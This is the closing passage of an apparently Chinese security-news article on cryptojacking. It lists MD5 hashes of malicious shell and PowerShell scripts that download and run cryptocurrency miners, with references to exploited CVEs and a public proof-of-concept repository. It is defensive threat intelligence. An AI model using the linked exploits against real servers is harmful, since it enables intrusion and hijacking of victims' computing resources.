f2c5331ba4d75093852dab89db4d85fa Linux Shell腳本,用于下載執行挖礦程序和配置文件
f3c6a83c7a8d341e773fa400b0ebf892 Linux Shell腳本,用于下載執行挖礦程序和配置文件
f64810aec556ffed2a4efcd7ef803006 Linux Shell腳本,用于下載執行挖礦程序和配置文件
f74316d78c172f0565b1477a43758ceb Linux Shell腳本,用于下載執行挖礦程序和配置文件
f767521a543290007c22a5656dc7471d Linux Shell腳本,用于下載執行挖礦程序和配置文件
f7d069b52c7aaf3924783f5725608247 Linux Shell腳本,用于下載執行挖礦程序和配置文件
3b606595fe4496d679be0fc0b4eb043e windows ps腳本,用于下載執行挖礦程序
66f4384f35b17243c1f5f174572322f8 windows ps腳本,用于下載執行挖礦程序
b846cad468d928a7dc1d16d44c4f6e44 windows ps腳本,用于下載執行挖礦程序
d3d10faa69a10ac754e3b7dde9178c22 windows ps腳本,用于下載執行挖礦程序
eab45a0186092fc8b8ec92135460a311 windows ps腳本,用于下載執行挖礦程序
eed97fa219ef050a29b1c72c970892e8 windows ps腳本,用于下載執行挖礦程序
03830406021978f97da30cbe1331ca8a 配置文件
3373e5c87350d7b0ea5e51b0f3d186b6 配置文件
406e36c5071eabe729bcd6da0cf09006 配置文件
88bcf358fcd60197f418cd1182ea75bb 配置文件
97f11060c28da973410a7e57ed3ed902 配置文件
aac77aad811a72860d4d418b04c5bdff 配置文件

參考

[1].https://groups.google.com/a/dcos.io/d/topic/users/NF4wMQ2VrJ8

[2].https://github.com/xmrig/xmrig

[3].https://github.com/lukacci/cpuhunter

[4].http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271

[5].https://www.blueliv.com/blog-news/research/drupalgeddon2-sa-core-2018-002-cve-2018-7600/

[6].http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600

[7].https://cert.360.cn/report/detail?id=c92cfff2634a44c8b1d6bd5e64c07f3d

[8].https://github.com/a2u/CVE-2018-7600

[9].http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12149

[10].http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635

[11].http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636

[12].https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers

[13].https://www.reddit.com/r/MoneroMining/comments/7nv8h6/xmrig_hackers/

[14].https://blog.csdn.net/Dancen/article/details/75313424

[15].https://www.cnblogs.com/birdstudio/p/7650622.html

[16].https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html

原文:https://www.anquanke.com/post/id/154381

上一篇:全球高級持續性威脅(APT)2018年中報告

下一篇:臺積電遭WannaCry攻擊已于昨天恢復 沒做好病毒掃描導致 預計損失2.5億美元